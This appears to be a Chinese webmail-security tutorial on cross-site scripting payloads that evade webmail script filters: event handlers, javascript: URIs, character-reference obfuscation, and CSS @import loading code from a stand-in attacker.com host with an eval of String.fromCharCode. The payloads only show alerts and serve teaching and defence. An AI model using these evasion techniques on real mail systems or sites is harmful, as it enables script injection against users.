Webmail攻防實(shí)戰(zhàn)(4)_Mail服務(wù)器教程

　　(1) 在html語言里，除了script元素內(nèi)的或在script元素內(nèi)引入的腳本程序能在html頁面裝載時(shí)被運(yùn)行外，使用事件屬性也能調(diào)用腳本程序運(yùn)行，事件屬性在JavaScript語言里被稱為事件句柄，用于對(duì)頁面上的某個(gè)特定事件（如鼠標(biāo)點(diǎn)擊、表單提交）做出響應(yīng)，驅(qū)動(dòng)javascript程序運(yùn)行。它的語法如下：

　　＜tag attribute1 attribute2 onEventName="javascript code；"＞

　　例如：

＜body onload="alert('JavaScript#1 is executed')；"＞
＜a href="#" onclick="alert('JavaScript#2 is executed')；"＞Click here＜/a＞
＜form method="post" action="#" onsubmit="alert('JavaScript#3 is executed')；"＞
＜input type="submit" value="Submit"＞
＜/form＞
＜/body＞

　　(2) URI（Universal Resource Identifier：通用資源標(biāo)識(shí)）用于定位Internet上每種可用的資源，如HTML文檔、圖像、聲音等。瀏覽器根據(jù)URI的資源類型（URI scheme）調(diào)用相應(yīng)的程序操作該資源，如果把一些元素的URI屬性值的資源類型設(shè)為javascript，則能夠調(diào)用javascript程序運(yùn)行。語法如下，注意要用“；”分隔不同的javascript語句：

　　＜tag attribute="javascript:javascript-code；"＞

　　例如：

＜body background="javascript:alert('JavaScript#1 is executed')；"＞
＜a href="javascript:alert('JavaScript#2 is executed')；"＞Click here＜/a＞
＜form method="post" action="javascript:alert('JavaScript#3 is executed')；"＞
＜input type="submit" value="Submit"＞
＜/form＞
＜img src="javascript:alert('JavaScript#4 is executed')；"＞
＜/body＞

　　(3) 由于軟硬件或其他原因，一些冷僻或特殊的字符不能輸入或正確顯示在html頁面上，為了解決這個(gè)問題，html中可以使用SGML字符參考。字符參考是一種用來指定文檔字符集中任何字符的獨(dú)立編碼機(jī)制，以“&”開始，以“；”結(jié)束。字符參考有兩種表達(dá)方式：數(shù)字字符參考和實(shí)體字符參考。數(shù)字字符參考的語法為“&#D；”（D代表一個(gè)十進(jìn)制數(shù)），或“&#xH；”、“&#XH；”（H代表一個(gè)十六進(jìn)制數(shù)），例如“&#65；”、“&#x41；”表示字母“A”，“&#27700；”、“&#x6C34；”表示漢字“水”。

　　攻擊者把html語句里的一些字符以數(shù)字字符參考來代替，這樣能避開WebMail系統(tǒng)對(duì)腳本程序的過濾。需要注意的是，元素和屬性不可以用字符參考表示，例如：

＜body＞
＜img lowsrc="j&#97；vas&#67；ript:alert('JavaScript#1 is executed')"＞
＜a href="&#x6a；av&#x41；s&#67；ript&#x3a；ale&#x72；t('JavaScript#2
&#x69；&#x73 executed')"＞Click her&#x65；＜/a＞
＜form method="post" action="javascript:alert('JavaScript#3 is
executed')"＞
＜input type="&#x53；ubmit" value="Submit"＞
＜/form＞
＜/body＞

　　(4) 樣式表是層疊樣式表單（CSS：Cascading Style Sheet）的簡(jiǎn)稱，用于控制、增強(qiáng)或統(tǒng)一網(wǎng)頁上的樣式（如字體、顏色等），它能夠?qū)�樣式信息與網(wǎng)頁內(nèi)容相分離，在html語言的style標(biāo)簽內(nèi)可以用@import聲明輸入一個(gè)樣式表。但是，如果輸入的資源類型或內(nèi)容是javascript，Internet Explorer瀏覽器仍然會(huì)執(zhí)行。

例如： ＜style type="text/css"＞
＜!--
@import url(javascript:alert('JavaScript#1 is executed'))；
@import url(http://www.attacker.com/js.css)；
--＞
＜/style＞

　　其中http://www.attacker.com/js.css的內(nèi)容如下所示：

@import url(javascript:alert('JavaScript#2 is executed'))；
@import url(javascript:eval(String.fromCharCode
(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,
108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)))；

　　能夠繞過WebMail系統(tǒng)對(duì)腳本程序過濾的方法遠(yuǎn)不止上面所說的這些，例如曾有人發(fā)現(xiàn)把“＜script＞”標(biāo)簽改成“＜_a＜script＞”和“＜＜script＞”的樣子能繞過yahoo電郵的過濾，這個(gè)漏洞yahoo在最近才改正過來。